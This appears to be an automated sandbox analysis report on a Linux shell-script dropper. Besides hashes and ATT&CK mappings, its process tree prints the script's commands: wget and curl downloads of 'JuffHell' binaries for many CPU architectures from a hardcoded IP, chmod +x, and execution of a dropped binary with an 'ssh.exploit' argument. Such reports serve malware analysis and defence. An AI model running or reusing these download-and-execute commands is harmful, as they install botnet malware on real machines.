55e90e18b443a15116c1102dd21397fd1c7dd1e9aff347e1267c27032e3e4bb3

Analysis

max time kernel
39s
max time network
41s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
14-10-2024 14:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Size

3KB
MD5

4de883db50a87d2eaf32038a6f48a3cf
SHA1

5d786ee84056677315f5eb9315f7a40d7fe8cb94
SHA256

30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55
SHA512

36bee2e2e6850fd3fb99fe832fb3de0f4792ac2b6fc7dc24987f4efb53ab8e747e6ace4d518ac3e2efa62cf997e787be7107b28a2cf305b0f7d13bbace13631d

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
849	chmod
854	chmod
859	chmod
864	chmod
844	chmod
736	chmod
743	chmod
791	chmod
804	chmod
826	chmod
836	chmod
869	chmod
730	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/dayum0x1a5sfd15as1fa	731	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	737	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	744	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	792	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	805	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	828	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	837	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	845	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	850	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	855	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	860	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	865	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	870	dayum0x1a5sfd15as1fa

Reads runtime system information 13 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
732	wget
734	curl
735	cat

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/JuffHell.i686	curl
File opened for modification	/tmp/JuffHell.ppc	curl
File opened for modification	/tmp/JuffHell.m68k	curl
File opened for modification	/tmp/JuffHell.spc	curl
File opened for modification	/tmp/JuffHell.arm7	curl
File opened for modification	/tmp/JuffHell.sh4	curl
File opened for modification	/tmp/dayum0x1a5sfd15as1fa	30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
File opened for modification	/tmp/JuffHell.mips	curl
File opened for modification	/tmp/JuffHell.arm	curl
File opened for modification	/tmp/JuffHell.arm6	curl
File opened for modification	/tmp/JuffHell.arc	curl
File opened for modification	/tmp/JuffHell.x86	curl
File opened for modification	/tmp/JuffHell.mpsl	curl
File opened for modification	/tmp/JuffHell.arm5	curl

/tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
/tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
1⤵
- Writes file to tmp directory
PID:700
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.x86
  2⤵
  PID:708
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:722
- /bin/cat
  cat JuffHell.x86
  2⤵
  PID:729
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:730
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:731
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.mips
  2⤵
  - System Network Configuration Discovery
  PID:732
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:734
- /bin/cat
  cat JuffHell.mips
  2⤵
  - System Network Configuration Discovery
  PID:735
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:737
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.mpsl
  2⤵
  PID:738
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:739
- /bin/cat
  cat JuffHell.mpsl
  2⤵
  PID:742
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:744
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm
  2⤵
  PID:747
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:789
- /bin/cat
  cat JuffHell.arm
  2⤵
  PID:790
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:792
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm5
  2⤵
  PID:793
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:798
- /bin/cat
  cat JuffHell.arm5
  2⤵
  PID:803
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:805
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm6
  2⤵
  PID:808
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:817
- /bin/cat
  cat JuffHell.arm6
  2⤵
  PID:825
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:826
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:828
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm7
  2⤵
  PID:829
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:834
- /bin/cat
  cat JuffHell.arm7
  2⤵
  PID:835
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-697a0a9baabf4f0db369deff28d514ca-systemd-timedated.service-Dry9w2
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:837
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.ppc
  2⤵
  PID:838
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:842
- /bin/cat
  cat JuffHell.ppc
  2⤵
  PID:843
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:845
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.m68k
  2⤵
  PID:846
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:847
- /bin/cat
  cat JuffHell.m68k
  2⤵
  PID:848
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:849
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:850
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.spc
  2⤵
  PID:851
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.spc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:852
- /bin/cat
  cat JuffHell.spc
  2⤵
  PID:853
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:854
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:855
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.i686
  2⤵
  PID:856
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:857
- /bin/cat
  cat JuffHell.i686
  2⤵
  PID:858
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:859
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:860
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.sh4
  2⤵
  PID:861
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:862
- /bin/cat
  cat JuffHell.sh4
  2⤵
  PID:863
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:864
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:865
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arc
  2⤵
  PID:866
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:867
- /bin/cat
  cat JuffHell.arc
  2⤵
  PID:868
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arc JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:869
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:870

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/JuffHell.x86

Filesize
162B

MD5
4f8e702cc244ec5d4de32740c0ecbd97

SHA1
3adb1f02d5b6054de0046e367c1d687b6cdf7aff

SHA256
9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a

SHA512
21047fea5269fee75a2a187aa09316519e35068cb2f2f76cfaf371e5224445e9d5c98497bd76fb9608d2b73e9dac1a3f5bfadfdc4623c479d53ecf93d81d3c9f

Download Submit